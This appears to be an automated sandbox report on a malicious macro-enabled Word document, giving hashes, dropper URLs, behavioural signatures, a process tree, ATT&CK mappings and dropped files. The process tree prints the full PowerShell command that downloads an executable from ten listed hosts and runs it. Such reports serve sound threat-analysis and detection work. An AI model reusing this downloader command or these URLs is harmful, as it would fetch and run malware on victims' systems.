Analysis

  • max time kernel: 81s
  • max time network: 74s
  • platform: windows7_x64
  • resource: win7-20220414-en
  • submitted: 21-05-2022 03:38

General

  • Target: 08142020_1955816493.docm
  • Size: 381KB
  • MD5: 8b9a76bee8f32292b25d55383c100d2c
  • SHA1: fe63d6a4046682dabce9cc6e49bc22fbbb8399e4
  • SHA256: a1ea10b25a1dd9165910a6859847f4bc6437f06e4651f8cc31ddf3b9d50be3c2
  • SHA512: 9fc9740134ec8bd07b7f18ce2ab4b52136ebce65ed7d5a62493efceb545ba2a1aedd2217360f933f386716ccb5554a0700aef17949b724e7e301ab6cdaa22d15

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs:
    • exe.dropper: http://rijschoolfastandserious.nl/rprmloaw/111111.png
    • exe.dropper: http://nanfeiqiaowang.com/tsxwe/111111.png
    • exe.dropper: http://forum.insteon.com/suowb/111111.png
    • exe.dropper: http://webtest.pp.ua/yksrpucvx/111111.png
    • exe.dropper: http://quoraforum.com/btmlxjxmyxb/111111.png
    • exe.dropper: http://quickinsolutions.com/wfqggeott/111111.png
    • exe.dropper: http://bronco.is/pdniovzkgwwt/111111.png
    • exe.dropper: http://studiomascellaro.it/wnzzsbzbd/111111.png
    • exe.dropper: http://craniotylla.ch/vzufnt/111111.png
    • exe.dropper: http://marineworks.eu/dwaunrsamlbq/111111.png

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request (21 IoCs)
  • Drops file in System32 directory (1 IoC)
  • Drops file in Windows directory (1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe (1 IoC)
  • Kills process with taskkill (1 IoC)
  • Modifies Internet Explorer settings (1 TTP, 9 IoCs)
  • Modifies registry class (64 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (19 IoCs)

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\08142020_1955816493.docm"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
      2⤵
      • Process spawned unexpected child process
      PID:1404
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1584
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1772
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:960
        • C:\Windows\system32\taskkill.exe
          Taskkill /IM "winword.exe" /F
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1540
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell Foreach($url in @('http://rijschoolfastandserious.nl/rprmloaw/111111.png','http://nanfeiqiaowang.com/tsxwe/111111.png','http://forum.insteon.com/suowb/111111.png','http://webtest.pp.ua/yksrpucvx/111111.png','http://quoraforum.com/btmlxjxmyxb/111111.png','http://quickinsolutions.com/wfqggeott/111111.png','http://bronco.is/pdniovzkgwwt/111111.png','http://studiomascellaro.it/wnzzsbzbd/111111.png','http://craniotylla.ch/vzufnt/111111.png','http://marineworks.eu/dwaunrsamlbq/111111.png')) { try{$path = 'C:\BlotRots\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
          4⤵
          • Blocklisted process makes network request
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:980
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          4⤵
          • Delays execution with timeout.exe
          PID:1672

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion: Modify Registry (T1112), 1
  • Discovery: System Information Discovery (T1082), 1

Downloads

  • C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd
    • Filesize: 5KB
    • MD5: 2d63e5c7ff61a560f0cc7dccd0661bf6
    • SHA1: 995efc69bd84b193786de1a993ad7052f14e9542
    • SHA256: 94a12075382cb44133ba8dd51973b583d4c2514f7d3d7414ae4d9a92b5354584
    • SHA512: 94254c0bbbc1c06bc93aeb6264d7d2cdd46ba3ff55fccdc3a669d3d713083a45b9e066a780f5b9684e6b8226c4acaca80df6d61ad5bb1d53c6bb66d9ec2e073c

  • C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
    • Filesize: 68KB
    • MD5: ad7b09adba59218ce485148faf21dc82
    • SHA1: 0a3851f903f7d928688e5ebeee13f6d5d921b4de
    • SHA256: 214fd312196dd5769f94ed778c50df1eaf49a5c8287c67edcf2fbd05dff02cb2
    • SHA512: 1fb8361f343e174574eae776fae701580c32dcbb6e120e181190bafb80d5968af788d1edb68f1450d6ddbd62f0bc15d8d9c5bcce6187d712a3afe71c57669f4f

  • C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty.vbs
    • Filesize: 2KB
    • MD5: f07e30c22ead3c49606617eb04fbf9c7
    • SHA1: 539dbd8cda2c1e6ada7a02e146c33b5aae7b1099
    • SHA256: 4639cb4ccdef149ef325770ccf4fff658b7cb528d71661113dbfe9e1c683dbf9
    • SHA512: 10f721ecf33fe97d074e2b5dd538ff83527a7db3ac4a0cfda183db9c9a2949dc9dd17361eb89e40e4a9865444c721108e1c4b7525337d83ba533250cb6ab052b

  • memory/960-67-0x0000000000000000-mapping.dmp
  • memory/980-75-0x00000000027BB000-0x00000000027DA000-memory.dmp (Filesize: 124KB)
  • memory/980-73-0x000007FEF33B0000-0x000007FEF3F0D000-memory.dmp (Filesize: 11.4MB)
  • memory/980-74-0x00000000027B4000-0x00000000027B7000-memory.dmp (Filesize: 12KB)
  • memory/980-72-0x000007FEF3F10000-0x000007FEF4933000-memory.dmp (Filesize: 10.1MB)
  • memory/980-70-0x0000000000000000-mapping.dmp
  • memory/1404-59-0x0000000000000000-mapping.dmp
  • memory/1404-61-0x000000006ADF1000-0x000000006ADF3000-memory.dmp (Filesize: 8KB)
  • memory/1540-69-0x0000000000000000-mapping.dmp
  • memory/1584-62-0x000007FEFBC91000-0x000007FEFBC93000-memory.dmp (Filesize: 8KB)
  • memory/1672-76-0x0000000000000000-mapping.dmp
  • memory/1772-64-0x0000000000000000-mapping.dmp
  • memory/1984-65-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/1984-54-0x00000000725F1000-0x00000000725F4000-memory.dmp (Filesize: 12KB)
  • memory/1984-58-0x000000007105D000-0x0000000071068000-memory.dmp (Filesize: 44KB)
  • memory/1984-57-0x00000000756E1000-0x00000000756E3000-memory.dmp (Filesize: 8KB)
  • memory/1984-56-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/1984-55-0x0000000070071000-0x0000000070073000-memory.dmp (Filesize: 8KB)